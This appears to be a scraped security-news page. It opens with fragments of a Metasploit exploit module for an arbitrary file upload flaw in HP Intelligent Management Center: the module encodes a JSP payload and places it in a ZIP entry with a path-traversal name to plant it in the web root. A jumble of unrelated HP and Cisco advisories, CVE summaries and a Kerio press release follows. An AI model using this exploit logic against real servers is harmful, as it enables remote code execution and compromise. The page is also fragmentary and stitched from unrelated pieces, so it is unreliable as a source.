HP Intelligent Management Center Arbitrary File Upload Exploit
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking
if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ return Exploit::CheckCode::Detected end
return Exploit::CheckCode::Safe end
def exploit @peer = "#{rhost}:#{rport}"
# New lines are handled on the vuln app and payload is corrupted jsp = payload.encoded.gsub(/x0dx0a/, "").gsub(/x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
# Zipping with CM_STORE to avoid errors while zip decompressing # on the Java vulnerable application zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp)
if res and res.code == 200 and res.body.empty? print_status("#{@peer} - JSP payload uploaded successfully") register_files_for_cleanup(jsp_name) else fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed") end
28.04.2018 HPSBMA02424 SSRT080125 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1SUPPORT COMMUNICATION - SECURITY BULLETINDocument ID: c01723303Version: 1HPSBMA02424 SSRT080125 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary CodeNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.Release Date: 2009-04-27Last Updated: 2009-04-27Potential Security Impact: Remote execution of arbitrary codeSource: Hewlett-Packard Company, HP Software Security Response TeamVULNERABILITY SUMMARYA potential vulnerability has been identified with HP OpenView Network Node Man...23.03.2018 CVE-2009-0584 icc.c in the International Color Consortium (ICC) Format library (aka icclib), as used in Ghostscript 8.64 and earlier and Argyll Color Management System (CMS) 1.0.3 and earlier, allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code by using a device file for processing a crafted image file associated with large integer values for certain sizes, related to an ICC profile in a (1) PostScript or (2) PDF file with embedded images.09.04.2018 Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA Adaptive Security Appliance and Cisco PIX Security Appliances -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA AdaptiveSecurity Appliance and Cisco PIX Security AppliancesAdvisory ID: cisco-sa-20090408-asahttp://www.cisco.com/warp/public/707/cisco-sa-20090408-asa.shtmlRevision 1.0For Public Release 2009 April 08 1600 UTC (GMT)Summary=======Multiple vulnerabilities exist in the Cisco ASA 5500 Series AdaptiveSecurity Appliances and Cisco PIX Security Appliances. This securityadvisory outlines the details of these vulnerabilities: * VPN Authentication Bypass when Account Override F...26.01.2018 HPSBMA02485 SSRT090252 rev.1 - HP Power Manager, Remote Execution of Arbitrary Code -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01971741 Version: 1 HPSBMA02485 SSRT090252 rev.1 - HP Power Manager, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2010-01-19 Last Updated: 2010-01-19 Potential Security Impact: Remote execution of arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Power Manager. The vulnerabi...31.01.2018 Kerio Brings Content and Conversation Together with Samepage.io Cloud-based Platform For Sharing Content and Files Brings True Transparency to Organizational Collaboration SAN JOSE, Calif., Jan. 31, 2012 – Kerio today introduced Samepage.io, a built-for- business cloud service that provides social collaboration, file sharing and project management capabilities to help savvy organizations work better together. Samepage, accessible at www.samepage.io, makes it easy for colleagues to share and collaborate on documents, files, notes, discussions and multimedia content.read more11.09.2018 CVE-2014-2223 Unrestricted file upload vulnerability in plog-admin/plog-upload.php in Plogger 1.0 RC1 and earlier allows remote authenticated users to execute arbitrary code by uploading a ZIP file that contains a PHP file and a non-zero length PNG file, then accessing the PHP file via a direct request to it in plog-content/uploads/archive/.22.12.2018 CVE-2009-4140 Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Chart v2 Beta 1 through v2 Lug Wyrm Charmer, as used in Piwik 0.2.35 through 0.4.3 and possibly other products, when register_globals is enabled, allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension through the name parameter with the code in the HTTP_RAW_POST_DATA parameter, then accessing it via a direct request to the file in tmp-upload-images/.01.07.2018 Выполнение произвольного кода в продуктах HP Intelligent Management Center Удаленный пользователь может скомпрометировать целевую систему.18.08.2018 CVE-2008-3703 The management console in the Volume Manager Scheduler Service (aka VxSchedService.exe) in Symantec Veritas Storage Foundation for Windows (SFW) 5.0, 5.0 RP1a, and 5.1 accepts NULL NTLMSSP authentication, which allows remote attackers to execute arbitrary code via requests to the service socket that create"snapshots schedules"registry values specifying future command execution. NOTE: this issue exists because of an incomplete fix for CVE-2007-2279.14.08.2018 CVE-2008-3699 The MagnatuneBrowser::listDownloadComplete function in magnatunebrowser/magnatunebrowser.cpp in Amarok before 1.4.10 allows local users to overwrite arbitrary files via a symlink attack on the album_info.xml temporary file.
Нет комментариев. Почему бы Вам не оставить свой?
Вы не можете отправить комментарий анонимно, пожалуйста зарегистрируйтесь.
